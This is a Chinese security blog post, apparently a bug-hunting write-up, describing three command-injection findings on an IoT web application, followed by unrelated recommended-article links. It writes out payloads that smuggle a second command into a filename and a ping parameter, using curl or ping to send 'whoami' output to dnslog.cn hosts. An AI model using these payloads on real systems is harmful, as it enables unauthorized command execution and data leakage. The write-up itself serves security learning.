那年那日那些洞

已于 2022-10-05 21:33:57 修改
阅读量157 收藏
点赞数
文章标签: 安全 web安全
于 2022-10-05 21:33:05 首次发布
原文链接:https://www.yuque.com/shier-mfbht/qh4bgb/il93xz
版权

前言

此文库主要是记录一年来一些有趣的漏洞,拿出来给大家分享一下,仅供学习参考,禁止对任何未授权的网站进行实操。

此系列会持续更新~~~也欢迎大家投稿!!

1.命令执行

不说废话直接上图,这是一个iot的站所以有些功能点就很奇怪的。

图片

图片

图片

修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn

图片

图片

神奇吧,为什么我会想到在filename拼接语句呢

因为平时在上传点的filename也是有概率存在rce的,所以我就试了试

图片

图片

凑字数凑字数凑字数凑字数凑字数凑字数凑凑字数凑字数字数2.命令执行

还是iot的站图片

图片

看到ping的字眼就要注意了,这个包很明显就是在ping 192.168.5.1

这个包,把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样

图片

图片

3.(惊掉你眼睛的)命令执行

同样还是iot的站,跟上面是同一个站点

图片

这是试听的原始包。

图片

但是他的返回包是这样的

图片

于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn

图片

图片

神奇吧!!!!!!!!!!

目标是成为神奇宝贝大师
关注
Python使用datetime中的timedelta模块实现时间增减:python计算100天后是哪年那月那日
data+scenario+science+insight
11-16 423
Python使用datetime中的timedelta模块实现时间增减:python计算100天后是哪年那月那日? 目录 Python使用datetime中的timedelta模块实现时间增减:python计算100天后是哪年那月那日? timedalta #python计算100天后是哪年那月那日? timedalta timedelta 是datetime中的一个对象,该对象表示两个时间的差值 构造函数:datetime.timedelta(days=0, seconds.
记那对住在我隔壁储藏室的大学刚毕业的小夫妻
CODER 沙漠孤狐
09-12 1189
 (一)   从搬进,这家民房的第一天,我就开始怀疑我隔壁的那个储藏室根本没住人。一天到晚黑黢黢的,没半点声响。   我终于还是忍受不了房间里那个破沙发了,便又一次跟房东要求,能不能让我把一些杂物放进隔壁的储藏室。房东斜着眼,哼了一下:跟你说过多少次了?那储藏室租给一对民工夫妇了,里面住着人呢!   我算见识了广东人的抠门,就打算再也不去碰这一鼻子灰了。   那天,我出来倒垃圾,经过储藏室的门,听
《你是三月的小桨》光剑
热门推荐
AI天才研究院
03-10 1万+
你是三月的小桨尝觉 9他生知已 9夜莺 11清晨 11三月的风 12无题 13你最珍贵 13无题 15无题 16无题 16无题 17无题 18无题 19无题 20无题 20无题 21无题 22无题 23无题 23无题 24假如我是一缕春风 25这个世界 27活在这人世间 29我是黑夜的儿子 30死亡 31生活 32灵魂猎手 33英雄主义 34情爱交感 34从今天开始 35生命的绿草 35读...
你是三月的小桨
AI天才研究院
04-02 1万+
尝觉 9 他生知已 9 夜莺 11 清晨 11 三月的风 12 无题 13 你最珍贵 13 无题 15 无题 16 无题 16 无题 17 无题 18 无题 19 无题 20 无题 20 无题 21 无题 22 无题 23 无题 23 无题 24 假如我是一缕春风 25 这个世界 27 活在...
[转贴]记那对住在我隔壁储藏室的大学刚毕业的小夫妻
weixin_30375427的博客
06-11 181
[转贴]记那对住在我隔壁储藏室的大学刚毕业的小夫妻 (一)   从搬进,这家民房的第一天,我就开始怀疑我隔壁的那个储藏室根本没住人。一天到晚黑黢黢的,没半点声响。   我终于还是忍受不了房间里那个破沙发了,便又一次跟房东要求,能不能让我把一些杂物放进隔壁的储藏室。房东斜着眼,哼了一下:跟你说过多少次了?那储藏室租给一对   民工夫妇了,里面住着人呢!   我算见识了广...
11狼11-20
biran1980的专栏
05-02 6183
第一一章淑女与强盗          沈壁君醒来得很早。 风已往,火仍在燃烧着,显然又添了柴,这四面漏风的破庙里,居然充满了温暖之意。 但火堆旁那奇怪的男人已不在了。 难道他已不辞而别?沈壁君望着这闪动的火焰,心里忽然觉得很空虚、很寂寞、很孤独,就像是忽然间失去了什么?她甚至有种被人欺骗、被人抛弃了的感觉。 她自己也不知道自己怎会有这种感觉。 他们本就是陌生人,她连他的名字都不知道,他
西游记
qq_32485631的博客
11-06 260
白骨精篇 每人都有失恋的时候 而我失恋的时候,喜欢变成一个凡人。 我们最接近的时候,我跟他之间的距离只有0.01公分, 他的手掐在我的脖子上,想要杀死我,57个小时之后,我爱上了这只猴子。 世人都不知道我究竟长成什么样,有时候我是翩翩女娇娥,有时候我是垂垂老妇人, 更多的时候,我乐意变成千娇百媚的女子,或烟视媚行,或端庄娴静,看着那些臭男人一个一个被我的表象迷惑, 一个一个倒在我的怀里,然后死去...
影神图收录
baidu_41842895的博客
09-12 655
小妖-狼斥候 尔小狼,肝胆忠。求道切,赤炯炯。 劳以生,枉受穷。难自料,大梦空。 狼群中有只小妖,天性要强,终日只想赶紧得道,奈何他修炼不久,道行浅薄,无法修习族中深奥的法门,他便万分着急。 这日,小狼照例巡山,凑巧得了坛好酒,打山门过时,正巧撞见了守山的牯护院。那护院向来馋酒,便向小狼讨要。小狼心念一动,当下开了酒坛,与那护院对饮起来,趁机向护院讨教修炼秘法。因吃了这酒,牯护院不得不传授几招。小狼听罢很是欢喜,回家急急修炼起来。两个月后,小狼深觉牯护院所教助益甚少,便想放弃,忽想起那日以酒偷师,又翻出个小
云免流usb共享电脑_云免流usb共享电脑
weixin_31141099的博客
01-30 980
简介:’在碧纱宫前的一块大石墩上刻了下来。刘鹤真高举轻声道:共享‘从这里的宫女建造这里来的宫女,共享咱们还有什么用?说出来之人,就不能让她占了便宜。’那宫女道:‘就怕不喜欢人家发觉,也不能让她太过惊慌。’刘鹤真道:电脑‘多谢她关怀,电脑我和你一拜。’又道:‘当真?’那宫女道:‘我的太监、公公公,你们三位,我是结义兄弟。这里一共发了十二人前程,其余的从人到来,不必就住在家。你们的事一定通知,云免各位...
哲理故事300篇
溺水的鱼 - Later equals never.
05-07 5627
哲理故事300篇 1、一只火鸡和一头牛闲聊,火鸡说:我希望能飞到树顶,可我没有勇气。牛说:为什么不吃一点我的牛粪呢,他们很有营养。火鸡吃了一点牛粪,发现它确实给了它足够的力量飞到第一根树枝,第二天,火鸡又吃了更多的牛粪,飞到第二根树枝,两个星期后,火鸡骄傲的飞到了树顶,但不久,一个农夫看到了它,迅速的把它从树上射了下来。 生存之道1:牛屎运让你达到顶峰,但不能让你留在那里。 2...
C语言实现某年某月某日是某年的第几天
Bruce.yang的嵌入式之旅
02-23 3699
看到这个标题,想实现这样的功能其实挺简单的,用C语言的switch语句加上闰年,平年条件的判断,再加上一定的逻辑可以轻松实现这样的函数,在linux内核中,存在判断闰年平年的接口,我将它移植出来后,写成一个宏,供计算天数的函数来调用,看看是不是可以实现,来,上代码: #include #include enum { zero = 0 ,NUM_TWO = 2, NUM_THR = 13 ,t
用date()和mktime()函数写一个倒计时:现在的时间是哪年哪月那日几点几分几秒?今天距离下一个元旦(2025年1月1日)还有多少天?
10-19
在PHP中,我们可以结合`date()`和`mktime()`函数来创建一个简单的倒计时功能,首先获取当前时间,然后计算到下个新年(2025年1月1日)的日期差。下面是一个例子: ```php // 当前时间 $current_timestamp = time()...
【python爬虫】Python爬取+PR绘制你出生那日的星图
GUGID_的博客
09-28 680
python爬虫绘制具体某一日的星图 老妈最近因为某些事情去档案处查了自己的资料,发现真实出生时间和身份证上的不一样。刚好最近临近她的生日,想自己做一些礼物送给她,就在网上查了一下她出生日的星图,准备做一个她出生那天的星图变化的小视频送给她。 实践 在网上找了星图的网站,发现这个网站 https://www.heavens-above.com/能查到每日的星图,估计是根据时间计算了轨道之类的,天文方面我一窍不通。下面是实现步骤。 星图 heavensabove这个网站有实时交互星图。但是具体到过去的某一日
小猿日记 - 程序猿的日常日记(4)
谙忆-陈浩翔
05-18 1498
口水记 又过了一个周末,早晨自然又是踩点。请叫我踩点小猿。 上午都在忙着优化那日增几百万的数据库表了。 通过一些会议讨论,还是需要改动表结构才能进行分库分表,否则无法进行下去。因为通过什么字段的查询语句都有,那么这怎么分嘛~分了之后,未命中分表字段的查询那岂不是更坑。 所以新增了一个字段,该字段在所有的查询中,理论上都需要用到的,可惜的是,之前数据库的设计,未存储该字段。 现在要做的就是如下几步。(必须要做,不做的话,过些天就有宕机危险) 梳理出所有的查询sql 增加新字段作为查询条件 修改dao层的原有
AI与隐私:Facebook如何在数据保护中平衡创新与安全
2301_78954254的博客
11-07 664
在快速发展的数字时代,人工智能(AI)技术的应用正在为社交媒体平台带来前所未有的创新。然而,伴随着技术的进步,用户的隐私保护问题也愈加凸显。作为全球最大的社交网络之一,Facebook在推动AI技术应用的同时,必须面对如何在数据保护中实现创新与安全的平衡。本文将探讨Facebook在这一领域的策略和实践。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 415
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1256
信息安全工程师——操作系统安全概述篇
【AI写作宝-注册安全分析报告-无验证方式导致安全隐患】
最新发布
11-08 645
AI写作宝是一款基于人工智能技术的在线写作辅助工具,由合肥风平网络信息科技有限公司开发。它旨在帮助用户提升写作效率,通过AI技术自动生成文章、文案、作文等,适用于多种写作场景。该网站好像属于灰色地带的业务, 网站介绍什么的都没有,更容易被黑客攻击, 好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
shodan 【2】(泷羽sec)
m0_68984471的博客
11-08 857
shodan的使用方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值